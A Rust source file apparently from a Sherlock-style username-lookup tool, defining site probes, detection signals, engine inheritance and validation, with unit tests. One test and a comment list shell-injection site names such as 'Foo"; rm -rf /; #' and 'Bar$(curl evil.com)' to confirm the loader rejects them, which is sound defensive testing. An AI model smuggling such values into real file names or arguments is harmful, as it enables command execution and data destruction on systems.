Skip to main content

adler_core/
site.rs

1//! Site definitions and the multi-signal detection model.
2//!
3//! A site is a target URL plus a list of [`Signal`]s. Each signal is an
4//! independent rule that, when triggered against a response, votes either
5//! for the account existing ([`SignalVerdict::Found`]) or not
6//! ([`SignalVerdict::NotFound`]). Non-triggering signals stay silent
7//! ([`SignalVerdict::Ambiguous`]).
8//!
9//! Aggregation is **negative-priority**: if any signal votes
10//! [`SignalVerdict::NotFound`] the verdict is [`MatchKind::NotFound`];
11//! otherwise if any votes [`SignalVerdict::Found`] it is
12//! [`MatchKind::Found`]; with no votes at all it is
13//! [`MatchKind::Uncertain`].
14//!
15//! A `NotFound` vote wins over a `Found` vote because negative signals are
16//! specific (an exact "user not found" message, a 404, a login redirect)
17//! while a bare `200 OK` is weak positive evidence. This matches how
18//! Sherlock-style detectors work: a site that always returns 200 and only
19//! differentiates via an error string is correctly read as `NotFound` when
20//! that string is present, even though the 200 also satisfies a
21//! `StatusFound` signal.
22
23use std::fmt;
24
25use serde::{Deserialize, Serialize};
26
27use crate::check::MatchKind;
28use crate::error::{Error, Result};
29use crate::username::Username;
30
/// One site we can probe for the existence of an account.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Site {
    /// Human-readable site name. Doubles as the stable filter key
    /// (case-insensitive) used by CLI `--only` / `--exclude`.
    pub name: String,
    /// URL template containing a `{username}` placeholder. Rendered for
    /// a concrete username by [`Site::url_for`].
    pub url: UrlTemplate,
    /// Ordered list of detection signals. Aggregated per the module-level
    /// docs (a `NotFound` vote outranks a `Found` vote).
    /// Optional in source JSON when [`Site::engine`] is set — the engine's
    /// signals are inherited at load time. After
    /// [`crate::Registry`] resolution this vec is always non-empty (or the
    /// site fails `validate`).
    #[serde(default, skip_serializing_if = "Vec::is_empty")]
    pub signals: Vec<Signal>,
    /// One or more usernames known to exist on this site. Consumed by
    /// `adler doctor` to verify the signal list still reports `Found`
    /// for a real account. Accepts either a single string or an array
    /// of strings in JSON; the doctor probes each in declaration order
    /// and passes the present-check if **any** one of them resolves to
    /// `Found`. Listing several is defensive — brand accounts or other
    /// users that the site special-cases (e.g. Instagram's own
    /// `instagram` account) shouldn't false-fail the whole site.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub known_present: Option<KnownPresent>,
    /// Username known to *not* exist on this site (optional). When omitted,
    /// the doctor generates a random nonsense username instead.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub known_absent: Option<String>,
    /// Optional CSS-selector rules for pulling profile fields (name, bio,
    /// avatar, …) out of a `Found` page. Only applied under `--enrich`.
    #[serde(default, skip_serializing_if = "Vec::is_empty")]
    pub extract: Vec<Extractor>,
    /// Free-form classification tags for scanning a subset of the registry,
    /// e.g. `"social"`, `"dev"`, `"region:ru"`. Matched by CLI `--tag`.
    /// A site with no tags is universal (included unless a `--tag` filter
    /// excludes it). Conventionally lowercase; `axis:value` is just a naming
    /// convention, not enforced.
    #[serde(default, skip_serializing_if = "Vec::is_empty")]
    pub tags: Vec<String>,
    /// Extra HTTP headers to send with the probe (e.g.
    /// `{"X-IG-App-ID": "936619743392459"}` to unlock Instagram's
    /// `web_profile_info` endpoint, or a custom `User-Agent`). Browser
    /// backends apply them via `Network.setExtraHTTPHeaders` before
    /// navigation; the raw-HTTP path doesn't read this yet.
    #[serde(default, skip_serializing_if = "std::collections::BTreeMap::is_empty")]
    pub request_headers: std::collections::BTreeMap<String, String>,
    /// Optional regular expression describing usernames a site will
    /// accept. When set and the scanned username doesn't match, the
    /// site is skipped (the outcome is reported as `Uncertain` with
    /// reason `UsernameNotAllowed`, without issuing any HTTP request).
    /// Saves work AND avoids the false-positive class where a site
    /// 404s on illegal usernames in ways our signal can't tell apart
    /// from a missing account.
    ///
    /// Imported from Sherlock's `regexCheck` field; 95+ sites
    /// upstream carry one (length bounds, character classes, etc.).
    /// [`Site::validate`] test-compiles the pattern with
    /// `regex::Regex`. A pattern that fails to compile (for example
    /// one using lookarounds, which that crate does not support) is
    /// logged as a warning and the site still validates; the warning
    /// states that the username gate is disabled for that site.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub regex_check: Option<String>,
    /// Name of a shared [`Engine`] this site inherits from (e.g.
    /// `"Discourse"`, `"vBulletin"`). Forum-software platforms host
    /// thousands of instances with identical detection signatures;
    /// defining the signature once on an engine and inheriting it
    /// keeps the registry small and the cost of a platform-wide
    /// HTML change one fix instead of hundreds.
    ///
    /// At [`crate::Registry::validate`] time, engine fields are
    /// merged *under* the site's own — anything the site declares
    /// explicitly (`signals`, `request_headers`, `regex_check`) wins on
    /// conflict; anything left empty / unset is filled from the
    /// engine. An `engine: "X"` referring to a non-existent X is a
    /// load-time error.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub engine: Option<String>,
}
109
/// Shared detection signature template for a family of sites that
/// run the same forum / blog / wiki software (Discourse, vBulletin,
/// `XenForo`, `MediaWiki`, …). Referenced from [`Site::engine`].
///
/// Engines carry the same kinds of fields as a [`Site`] does (just
/// the inheritable ones — there's no per-engine `url`, that comes
/// from the site itself). At registry load, the engine's fields
/// are merged *under* each referring site's own fields: site wins
/// on conflict. [`Engine::merge_into`] implements that merge and
/// [`Engine::validate`] checks the engine's own fields.
#[derive(Debug, Clone, Default, Serialize, Deserialize)]
#[non_exhaustive]
pub struct Engine {
    /// Default detection signals for sites of this family.
    /// Inherited only when the site itself declares no `signals`.
    #[serde(default, skip_serializing_if = "Vec::is_empty")]
    pub signals: Vec<Signal>,
    /// Default extra HTTP headers (e.g. a User-Agent that the
    /// platform accepts where the browser default gets blocked).
    /// Merged with the site's own headers; site wins per-key.
    #[serde(default, skip_serializing_if = "std::collections::BTreeMap::is_empty")]
    pub request_headers: std::collections::BTreeMap<String, String>,
    /// Default username-validity regex inherited only when the site
    /// itself doesn't declare one. A pattern that does not compile is
    /// only logged as a warning by [`Engine::validate`].
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub regex_check: Option<String>,
}
136
137impl Engine {
138    /// Compile-check the engine's own constraints — the inheritable
139    /// fields are subject to the same validation as a site's would
140    /// be.
141    ///
142    /// # Errors
143    /// Returns [`Error::InvalidSite`] when the engine name is
144    /// empty, a signal carries an empty marker, or any other
145    /// constraint a [`Site::validate`] would also flag.
146    pub fn validate(&self, name: &str) -> Result<()> {
147        if name.trim().is_empty() {
148            return Err(Error::InvalidSite {
149                reason: "engine name is empty".into(),
150            });
151        }
152        for signal in &self.signals {
153            signal.validate().map_err(|reason| Error::InvalidSite {
154                reason: format!("engine {name:?}: {reason}"),
155            })?;
156        }
157        if let Some(pat) = &self.regex_check {
158            if let Err(err) = regex::Regex::new(pat) {
159                tracing::warn!(
160                    engine = %name, pattern = %pat, error = %err,
161                    "engine regex_check did not compile; gate disabled for inheriting sites",
162                );
163            }
164        }
165        Ok(())
166    }
167
168    /// Fill the inheritable empty / unset fields of `site` from
169    /// this engine. Site fields are authoritative: if the site has
170    /// any signals at all, no engine signals are merged in.
171    /// `request_headers` merge per-key (site wins on per-key
172    /// conflict).
173    pub fn merge_into(&self, site: &mut Site) {
174        if site.signals.is_empty() {
175            site.signals.clone_from(&self.signals);
176        }
177        for (k, v) in &self.request_headers {
178            site.request_headers
179                .entry(k.clone())
180                .or_insert_with(|| v.clone());
181        }
182        if site.regex_check.is_none() {
183            site.regex_check.clone_from(&self.regex_check);
184        }
185    }
186}
187
/// Known-present declaration on a [`Site`].
///
/// In JSON this is `untagged`: a plain string `"torvalds"` deserialises
/// into [`KnownPresent::Single`], an array `["torvalds", "leomessi"]`
/// into [`KnownPresent::Multiple`]. Serialisation preserves the form
/// the site was authored with, so single-username entries stay
/// compact.
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(untagged)]
#[non_exhaustive]
pub enum KnownPresent {
    /// Exactly one candidate username.
    Single(String),
    /// A list of candidate usernames, intended to hold two or more.
    /// The type itself does not enforce a minimum length; an empty
    /// list is rejected by [`Site::validate`]. Doctor passes if any
    /// resolve to `Found`.
    Multiple(Vec<String>),
}
205
206impl KnownPresent {
207    /// View all candidate usernames as a slice, in declaration order.
208    /// Always non-empty for `Single`; may be empty for a hand-authored
209    /// `Multiple([])` (validation rejects that).
210    pub fn as_slice(&self) -> &[String] {
211        match self {
212            Self::Single(s) => std::slice::from_ref(s),
213            Self::Multiple(v) => v.as_slice(),
214        }
215    }
216
217    /// Primary candidate — the first declared username. `Single`
218    /// always has one; `Multiple` may be empty if a contributor wrote
219    /// `[]` (caught by [`Site::validate`]).
220    pub fn primary(&self) -> Option<&str> {
221        self.as_slice().first().map(String::as_str)
222    }
223}
224
225impl From<&str> for KnownPresent {
226    fn from(s: &str) -> Self {
227        Self::Single(s.to_owned())
228    }
229}
230
231impl From<String> for KnownPresent {
232    fn from(s: String) -> Self {
233        Self::Single(s)
234    }
235}
236
/// Upper bound on a site name's length. Names appear in CLI output,
/// CSV columns, and the validate-sites.yml workflow's run-summary
/// table — keeping them short avoids both UI breakage and
/// pathological CI artefacts.
///
/// Enforced by [`Site::validate`], which checks the length before it
/// checks the name's character class.
const NAME_MAX_LEN: usize = 80;
242
/// Report whether `name` is limited to characters that are safe to
/// interpolate into shell, CSV, and CLI argument contexts. Mirrors the
/// JSON Schema pattern `^[\w][\w .()!/+-]*$`, with `\w` restricted to
/// ASCII letters, ASCII digits and `_`.
///
/// The first character must be a word character; every later one may
/// also be a space or one of `.()!/+-`. The empty string is rejected.
fn is_safe_site_name(name: &str) -> bool {
    /// Punctuation (and space) allowed anywhere except position 0.
    const EXTRA: &str = " .()!/+-";

    fn is_word(c: char) -> bool {
        c == '_' || c.is_ascii_alphanumeric()
    }

    !name.is_empty()
        && name
            .chars()
            .enumerate()
            .all(|(idx, c)| is_word(c) || (idx > 0 && EXTRA.contains(c)))
}
259
/// A rule for extracting one profile field from a page.
///
/// [`Site::validate`] rejects a rule whose `field` is empty or
/// whitespace-only, or whose `selector` is not accepted by
/// `scraper::Selector::parse`.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Extractor {
    /// Output field name, e.g. `"avatar"`, `"bio"`, `"name"`.
    pub field: String,
    /// CSS selector locating the element.
    pub selector: String,
    /// Attribute to read (e.g. `"src"`, `"content"`). When omitted, the
    /// element's trimmed text content is used.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub attr: Option<String>,
}
272
273impl Site {
274    /// Render the site URL for a given username.
275    pub fn url_for(&self, username: &Username) -> String {
276        self.url.substitute(username.as_str())
277    }
278
279    /// Validate semantic invariants the type system can't enforce
280    /// (empty signals list, empty markers, empty status code sets).
281    pub fn validate(&self) -> Result<()> {
282        if self.name.trim().is_empty() {
283            return Err(Error::InvalidSite {
284                reason: "site name is empty".into(),
285            });
286        }
287        // Site names doubled as shell-interpolation values in the
288        // `validate-sites.yml` PR gate; an unsanitised name like
289        // `Foo"; rm -rf /; #` would have broken out of `"$name"`
290        // quoting and run arbitrary commands on the runner. Both the
291        // JSON Schema and this Rust loader enforce a safe character
292        // class (word chars plus a few visual punctuation marks) at
293        // every entry point.
294        if self.name.len() > NAME_MAX_LEN {
295            return Err(Error::InvalidSite {
296                reason: format!(
297                    "site name longer than {NAME_MAX_LEN} chars: {:?}",
298                    self.name
299                ),
300            });
301        }
302        if !is_safe_site_name(&self.name) {
303            return Err(Error::InvalidSite {
304                reason: format!(
305                    "site name {:?} contains characters outside the allowed \
306                     set (word chars, space, `.()!/+-`)",
307                    self.name
308                ),
309            });
310        }
311        if self.signals.is_empty() {
312            return Err(Error::InvalidSite {
313                reason: format!("site {:?}: signals list is empty", self.name),
314            });
315        }
316        for signal in &self.signals {
317            signal.validate().map_err(|reason| Error::InvalidSite {
318                reason: format!("site {:?}: {reason}", self.name),
319            })?;
320        }
321        for extractor in &self.extract {
322            if extractor.field.trim().is_empty() {
323                return Err(Error::InvalidSite {
324                    reason: format!("site {:?}: extractor has an empty field name", self.name),
325                });
326            }
327            if scraper::Selector::parse(&extractor.selector).is_err() {
328                return Err(Error::InvalidSite {
329                    reason: format!(
330                        "site {:?}: invalid CSS selector {:?} for field {:?}",
331                        self.name, extractor.selector, extractor.field
332                    ),
333                });
334            }
335        }
336        if let Some(pat) = &self.regex_check {
337            if let Err(err) = regex::Regex::new(pat) {
338                // Sherlock's regexes occasionally use lookarounds
339                // (e.g. `(?![.-])`), which the Rust `regex` crate
340                // doesn't support — it's a true regular-language
341                // engine for performance + DoS safety. Rather than
342                // reject the whole site over a username-gate the
343                // probe path will simply skip, downgrade to a warn
344                // and let the site keep working at the cost of one
345                // wasted probe per illegal username.
346                tracing::warn!(
347                    site = %self.name, pattern = %pat, error = %err,
348                    "regex_check did not compile; username-gate disabled for this site",
349                );
350            }
351        }
352        if let Some(kp) = &self.known_present {
353            if kp.as_slice().is_empty() {
354                return Err(Error::InvalidSite {
355                    reason: format!("site {:?}: known_present is an empty list", self.name),
356                });
357            }
358            for name in kp.as_slice() {
359                if name.trim().is_empty() {
360                    return Err(Error::InvalidSite {
361                        reason: format!(
362                            "site {:?}: known_present contains an empty username",
363                            self.name
364                        ),
365                    });
366                }
367            }
368        }
369        for tag in &self.tags {
370            if tag.trim().is_empty() {
371                return Err(Error::InvalidSite {
372                    reason: format!("site {:?}: tag is empty", self.name),
373                });
374            }
375        }
376        Ok(())
377    }
378}
379
/// URL template containing a `{username}` placeholder.
///
/// Validated at construction: must contain the placeholder and start with
/// `http://` or `https://`. Deserialisation goes through
/// [`UrlTemplate::new`], so values loaded from JSON get the same checks.
#[derive(Debug, Clone, PartialEq, Eq)]
pub struct UrlTemplate(String);
386
/// Literal token a [`UrlTemplate`] must contain; every occurrence is
/// replaced by the username when the template is rendered.
const PLACEHOLDER: &str = "{username}";
388
389impl UrlTemplate {
390    /// Build a template, validating placeholder and scheme.
391    pub fn new(template: impl Into<String>) -> Result<Self> {
392        let t = template.into();
393        if !t.contains(PLACEHOLDER) {
394            return Err(Error::InvalidSite {
395                reason: format!("url template missing {PLACEHOLDER} placeholder: {t:?}"),
396            });
397        }
398        if !(t.starts_with("http://") || t.starts_with("https://")) {
399            return Err(Error::InvalidSite {
400                reason: format!("url template must start with http(s)://: {t:?}"),
401            });
402        }
403        Ok(Self(t))
404    }
405
406    fn substitute(&self, username: &str) -> String {
407        self.0.replace(PLACEHOLDER, username)
408    }
409
410    /// Borrow the raw template (with placeholder).
411    pub fn as_str(&self) -> &str {
412        &self.0
413    }
414}
415
416impl fmt::Display for UrlTemplate {
417    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
418        f.write_str(&self.0)
419    }
420}
421
422impl Serialize for UrlTemplate {
423    fn serialize<S: serde::Serializer>(&self, s: S) -> std::result::Result<S::Ok, S::Error> {
424        self.0.serialize(s)
425    }
426}
427
428impl<'de> Deserialize<'de> for UrlTemplate {
429    fn deserialize<D: serde::Deserializer<'de>>(d: D) -> std::result::Result<Self, D::Error> {
430        let raw = String::deserialize(d)?;
431        Self::new(raw).map_err(serde::de::Error::custom)
432    }
433}
434
/// A single piece of evidence about whether an account exists.
///
/// Signals are tagged in JSON by their `kind`, spelled in snake case
/// (e.g. `"status_found"`, `"body_absent"`). New variants will land for
/// Phase 2 length-baseline scoring; the enum is `#[non_exhaustive]` so
/// adding variants is not a breaking change.
///
/// Naming note: the `*Absent` variants describe the *account* being
/// absent — they fire when their marker IS present in the response.
/// Body and URL markers are matched as plain, case-sensitive substrings.
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(tag = "kind", rename_all = "snake_case")]
#[non_exhaustive]
pub enum Signal {
    /// Votes **`Found`** when the response status is in `codes`.
    StatusFound {
        /// Status codes that vote for existence. Must be non-empty.
        codes: Vec<u16>,
    },
    /// Votes **`NotFound`** when the response status is in `codes`.
    StatusNotFound {
        /// Status codes that vote for non-existence. Must be non-empty.
        codes: Vec<u16>,
    },
    /// Votes **`Found`** when the response body contains `text`.
    BodyPresent {
        /// Substring whose appearance votes for existence. Must be non-empty.
        text: String,
    },
    /// Votes **`NotFound`** when the response body contains `text`.
    BodyAbsent {
        /// Substring whose appearance votes for non-existence (e.g.
        /// `"Profile not found"`). Must be non-empty.
        text: String,
    },
    /// Votes **`NotFound`** when the final URL (post-redirect) contains
    /// `fragment`.
    RedirectAbsent {
        /// Substring that, when present in the final URL, indicates the
        /// account is missing (typically `"/login"` or `"/404"`). Must be
        /// non-empty.
        fragment: String,
    },
}
474
/// Probe data extracted from an HTTP response, fed to each [`Signal`].
///
/// Internal detection plumbing — not part of the public API.
#[derive(Debug)]
pub(crate) struct Probe<'a> {
    /// HTTP status code. Read by the `StatusFound` / `StatusNotFound`
    /// signals.
    pub(crate) status: u16,
    /// Final URL after redirects. Read by the `RedirectAbsent` signal.
    pub(crate) final_url: &'a str,
    /// Decoded response body. Empty string when no body-using signal is configured.
    /// Read by the `BodyPresent` / `BodyAbsent` signals.
    pub(crate) body: &'a str,
}
487
/// What one signal concluded after looking at a probe.
///
/// Produced by [`Signal::evaluate`] and combined across a site's
/// signals by [`aggregate`].
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub(crate) enum SignalVerdict {
    /// This signal votes that the account exists.
    Found,
    /// This signal votes that the account does not exist. A single such
    /// vote decides the aggregated result.
    NotFound,
    /// This signal had nothing to say (its trigger condition didn't match).
    /// Ignored during aggregation.
    Ambiguous,
}
498
499impl Signal {
500    /// True if this signal needs to inspect the response body. Used by the
501    /// client to skip body reads when no signal requires them.
502    pub(crate) fn needs_body(&self) -> bool {
503        matches!(self, Self::BodyPresent { .. } | Self::BodyAbsent { .. })
504    }
505
506    /// Evaluate this signal against a probe and produce a vote.
507    pub(crate) fn evaluate(&self, probe: &Probe<'_>) -> SignalVerdict {
508        match self {
509            Self::StatusFound { codes } => {
510                if codes.contains(&probe.status) {
511                    SignalVerdict::Found
512                } else {
513                    SignalVerdict::Ambiguous
514                }
515            }
516            Self::StatusNotFound { codes } => {
517                if codes.contains(&probe.status) {
518                    SignalVerdict::NotFound
519                } else {
520                    SignalVerdict::Ambiguous
521                }
522            }
523            Self::BodyPresent { text } => {
524                if probe.body.contains(text.as_str()) {
525                    SignalVerdict::Found
526                } else {
527                    SignalVerdict::Ambiguous
528                }
529            }
530            Self::BodyAbsent { text } => {
531                if probe.body.contains(text.as_str()) {
532                    SignalVerdict::NotFound
533                } else {
534                    SignalVerdict::Ambiguous
535                }
536            }
537            Self::RedirectAbsent { fragment } => {
538                if probe.final_url.contains(fragment.as_str()) {
539                    SignalVerdict::NotFound
540                } else {
541                    SignalVerdict::Ambiguous
542                }
543            }
544        }
545    }
546
547    /// Human-readable description of why this signal fired against `probe`,
548    /// for verdict explainability. Only meaningful for a signal that voted
549    /// (i.e. didn't return [`SignalVerdict::Ambiguous`]); the caller filters.
550    pub(crate) fn describe_match(&self, probe: &Probe<'_>) -> String {
551        match self {
552            Self::StatusFound { .. } => format!("HTTP {} (status_found)", probe.status),
553            Self::StatusNotFound { .. } => format!("HTTP {} (status_not_found)", probe.status),
554            Self::BodyPresent { text } => format!("body contains {text:?} (body_present)"),
555            Self::BodyAbsent { text } => format!("body contains {text:?} (body_absent)"),
556            Self::RedirectAbsent { fragment } => {
557                format!("final URL contains {fragment:?} (redirect_absent)")
558            }
559        }
560    }
561
562    fn validate(&self) -> std::result::Result<(), String> {
563        match self {
564            Self::StatusFound { codes } | Self::StatusNotFound { codes } => {
565                if codes.is_empty() {
566                    return Err("status signal codes list is empty".into());
567                }
568            }
569            Self::BodyPresent { text } | Self::BodyAbsent { text } => {
570                if text.is_empty() {
571                    return Err("body signal text is empty".into());
572                }
573            }
574            Self::RedirectAbsent { fragment } => {
575                if fragment.is_empty() {
576                    return Err("redirect signal fragment is empty".into());
577                }
578            }
579        }
580        Ok(())
581    }
582}
583
584/// Aggregate per-signal verdicts into a final [`MatchKind`].
585///
586/// Negative-priority counting: any `NotFound` vote → `NotFound`; otherwise
587/// any `Found` vote → `Found`; no votes at all → `Uncertain`. See the module
588/// docs for why a `NotFound` vote outranks a `Found` vote.
589pub(crate) fn aggregate<I>(verdicts: I) -> MatchKind
590where
591    I: IntoIterator<Item = SignalVerdict>,
592{
593    let mut found = false;
594    let mut not_found = false;
595    for v in verdicts {
596        match v {
597            SignalVerdict::Found => found = true,
598            SignalVerdict::NotFound => not_found = true,
599            SignalVerdict::Ambiguous => {}
600        }
601    }
602    if not_found {
603        MatchKind::NotFound
604    } else if found {
605        MatchKind::Found
606    } else {
607        MatchKind::Uncertain
608    }
609}
610
611#[cfg(test)]
612mod tests {
613    use super::*;
614
615    fn site_with(signals: Vec<Signal>) -> Site {
616        Site {
617            name: "Example".into(),
618            url: UrlTemplate::new("https://example.com/{username}").unwrap(),
619            signals,
620            known_present: None,
621            known_absent: None,
622            extract: Vec::new(),
623            tags: Vec::new(),
624            request_headers: std::collections::BTreeMap::new(),
625            regex_check: None,
626            engine: None,
627        }
628    }
629
630    #[test]
631    fn url_template_substitutes_placeholder() {
632        let user = Username::new("alice").unwrap();
633        let site = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
634        assert_eq!(site.url_for(&user), "https://example.com/alice");
635    }
636
637    #[test]
638    fn url_template_rejects_missing_placeholder() {
639        assert!(UrlTemplate::new("https://example.com/users/").is_err());
640    }
641
642    #[test]
643    fn url_template_rejects_bad_scheme() {
644        assert!(UrlTemplate::new("ftp://example.com/{username}").is_err());
645    }
646
647    #[test]
648    fn validate_requires_non_empty_signals() {
649        let err = site_with(vec![]).validate().unwrap_err();
650        assert!(err.to_string().contains("signals list is empty"));
651    }
652
653    #[test]
654    fn validate_rejects_empty_status_codes() {
655        let err = site_with(vec![Signal::StatusFound { codes: vec![] }])
656            .validate()
657            .unwrap_err();
658        assert!(err.to_string().contains("status signal"));
659    }
660
661    #[test]
662    fn validate_rejects_empty_body_text() {
663        let err = site_with(vec![Signal::BodyAbsent {
664            text: String::new(),
665        }])
666        .validate()
667        .unwrap_err();
668        assert!(err.to_string().contains("body signal"));
669    }
670
671    #[test]
672    fn validate_rejects_empty_redirect_fragment() {
673        let err = site_with(vec![Signal::RedirectAbsent {
674            fragment: String::new(),
675        }])
676        .validate()
677        .unwrap_err();
678        assert!(err.to_string().contains("redirect signal"));
679    }
680
681    #[test]
682    fn validate_rejects_shell_metacharacters_in_name() {
683        // The validate-sites.yml workflow used to inject `--only "$name"`
684        // where `$name` came from PR-controlled sites.json. A name like
685        // `Foo"; rm -rf /; #` would have broken out of `"..."` quoting
686        // and executed on the runner. Schema + this loader both enforce
687        // a safe character class; verify a representative selection of
688        // dangerous chars is rejected.
689        for bad in [
690            "Foo\"; rm -rf /; #",
691            "Bar$(curl evil.com)",
692            "Baz`whoami`",
693            "Qux\\nfoo",
694            "back\\slash",
695            "pipe|ish",
696            "semi;colon",
697            "amp&and",
698            "lt<gt>",
699        ] {
700            let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
701            s.name = bad.into();
702            let err = s.validate().unwrap_err();
703            assert!(
704                err.to_string()
705                    .contains("characters outside the allowed set"),
706                "expected unsafe-name rejection for {bad:?}, got {err}",
707            );
708        }
709    }
710
711    #[test]
712    fn validate_accepts_real_world_site_names() {
713        // Cross-check the validation against names we actually ship.
714        for ok in [
715            "GitHub",
716            "Steam Community (User)",
717            "X / Twitter",
718            "osu!",
719            "Eintracht Frankfurt Forum",
720            "Archive of Our Own",
721            "Career.habr",
722            "fl",
723            "GitLab.com",
724            "Sbazar.cz",
725        ] {
726            let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
727            s.name = ok.into();
728            assert!(s.validate().is_ok(), "expected {ok:?} to validate");
729        }
730    }
731
732    #[test]
733    fn validate_rejects_overlong_name() {
734        let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
735        s.name = "A".repeat(100);
736        let err = s.validate().unwrap_err();
737        assert!(err.to_string().contains("longer than"));
738    }
739
740    #[test]
741    fn validate_accepts_well_formed_regex_check() {
742        let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
743        s.regex_check = Some("^[a-zA-Z0-9_-]{3,40}$".into());
744        assert!(s.validate().is_ok());
745    }
746
747    #[test]
748    fn validate_tolerates_unsupported_regex_features() {
749        // Sherlock-imported regexes occasionally use lookarounds
750        // (e.g. `(?!...)`) that Rust's `regex` crate can't compile —
751        // those sites should still load, with the username-gate
752        // silently disabled rather than rejecting the whole site.
753        let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
754        s.regex_check = Some("^(?![.-])[a-zA-Z0-9_.-]{3,20}$".into());
755        assert!(
756            s.validate().is_ok(),
757            "lookaround-bearing regex should warn, not reject the site"
758        );
759    }
760
761    #[test]
762    fn signal_status_found_votes_only_on_match() {
763        let signal = Signal::StatusFound { codes: vec![200] };
764        let probe = Probe {
765            status: 200,
766            final_url: "https://example.com/alice",
767            body: "",
768        };
769        assert_eq!(signal.evaluate(&probe), SignalVerdict::Found);
770        let probe = Probe {
771            status: 404,
772            ..probe
773        };
774        assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
775    }
776
777    #[test]
778    fn signal_status_not_found_votes_only_on_match() {
779        let signal = Signal::StatusNotFound { codes: vec![404] };
780        let probe = Probe {
781            status: 404,
782            final_url: "",
783            body: "",
784        };
785        assert_eq!(signal.evaluate(&probe), SignalVerdict::NotFound);
786        let probe = Probe {
787            status: 200,
788            ..probe
789        };
790        assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
791    }
792
793    #[test]
794    fn signal_body_absent_votes_not_found_when_text_present() {
795        let signal = Signal::BodyAbsent {
796            text: "Profile not found".into(),
797        };
798        let probe = Probe {
799            status: 200,
800            final_url: "",
801            body: "<h1>Profile not found</h1>",
802        };
803        assert_eq!(signal.evaluate(&probe), SignalVerdict::NotFound);
804        let probe = Probe {
805            body: "<h1>Welcome alice</h1>",
806            ..probe
807        };
808        assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
809    }
810
811    #[test]
812    fn signal_redirect_absent_inspects_final_url() {
813        let signal = Signal::RedirectAbsent {
814            fragment: "/login".into(),
815        };
816        let probe = Probe {
817            status: 200,
818            final_url: "https://example.com/login?next=/alice",
819            body: "",
820        };
821        assert_eq!(signal.evaluate(&probe), SignalVerdict::NotFound);
822        let probe = Probe {
823            final_url: "https://example.com/alice",
824            ..probe
825        };
826        assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
827    }
828
829    #[test]
830    fn aggregate_found_when_only_found_signals_fire() {
831        let kind = aggregate([SignalVerdict::Found, SignalVerdict::Ambiguous]);
832        assert_eq!(kind, MatchKind::Found);
833    }
834
835    #[test]
836    fn aggregate_not_found_when_only_not_found_signals_fire() {
837        let kind = aggregate([SignalVerdict::NotFound, SignalVerdict::Ambiguous]);
838        assert_eq!(kind, MatchKind::NotFound);
839    }
840
841    #[test]
842    fn aggregate_not_found_wins_over_found() {
843        // Negative-priority: a NotFound vote outranks a Found vote.
844        let kind = aggregate([SignalVerdict::Found, SignalVerdict::NotFound]);
845        assert_eq!(kind, MatchKind::NotFound);
846    }
847
848    #[test]
849    fn aggregate_uncertain_when_no_signals_fire() {
850        let kind = aggregate([SignalVerdict::Ambiguous, SignalVerdict::Ambiguous]);
851        assert_eq!(kind, MatchKind::Uncertain);
852    }
853
854    #[test]
855    fn aggregate_empty_is_uncertain() {
856        let kind = aggregate(std::iter::empty());
857        assert_eq!(kind, MatchKind::Uncertain);
858    }
859
860    #[test]
861    fn needs_body_is_true_only_for_body_signals() {
862        assert!(!Signal::StatusFound { codes: vec![200] }.needs_body());
863        assert!(!Signal::StatusNotFound { codes: vec![404] }.needs_body());
864        assert!(
865            !Signal::RedirectAbsent {
866                fragment: "/login".into()
867            }
868            .needs_body()
869        );
870        assert!(Signal::BodyPresent { text: "x".into() }.needs_body());
871        assert!(Signal::BodyAbsent { text: "x".into() }.needs_body());
872    }
873
874    #[test]
875    fn deserializes_signal_list() {
876        let json = r#"{
877            "name": "GitHub",
878            "url": "https://github.com/{username}",
879            "signals": [
880                { "kind": "status_found", "codes": [200] },
881                { "kind": "status_not_found", "codes": [404] }
882            ]
883        }"#;
884        let site: Site = serde_json::from_str(json).unwrap();
885        assert_eq!(site.name, "GitHub");
886        assert_eq!(site.signals.len(), 2);
887        site.validate().unwrap();
888    }
889
890    proptest::proptest! {
891        /// For any mix of per-signal verdicts, aggregation obeys the
892        /// negative-priority spec: any NotFound wins; else any Found; else
893        /// Uncertain.
894        #[test]
895        fn aggregate_matches_negative_priority_spec(
896            votes in proptest::collection::vec(
897                proptest::prop_oneof![
898                    proptest::strategy::Just(SignalVerdict::Found),
899                    proptest::strategy::Just(SignalVerdict::NotFound),
900                    proptest::strategy::Just(SignalVerdict::Ambiguous),
901                ],
902                0..16,
903            ),
904        ) {
905            let kind = aggregate(votes.iter().copied());
906            let expected = if votes.contains(&SignalVerdict::NotFound) {
907                MatchKind::NotFound
908            } else if votes.contains(&SignalVerdict::Found) {
909                MatchKind::Found
910            } else {
911                MatchKind::Uncertain
912            };
913            proptest::prop_assert_eq!(kind, expected);
914        }
915    }
916}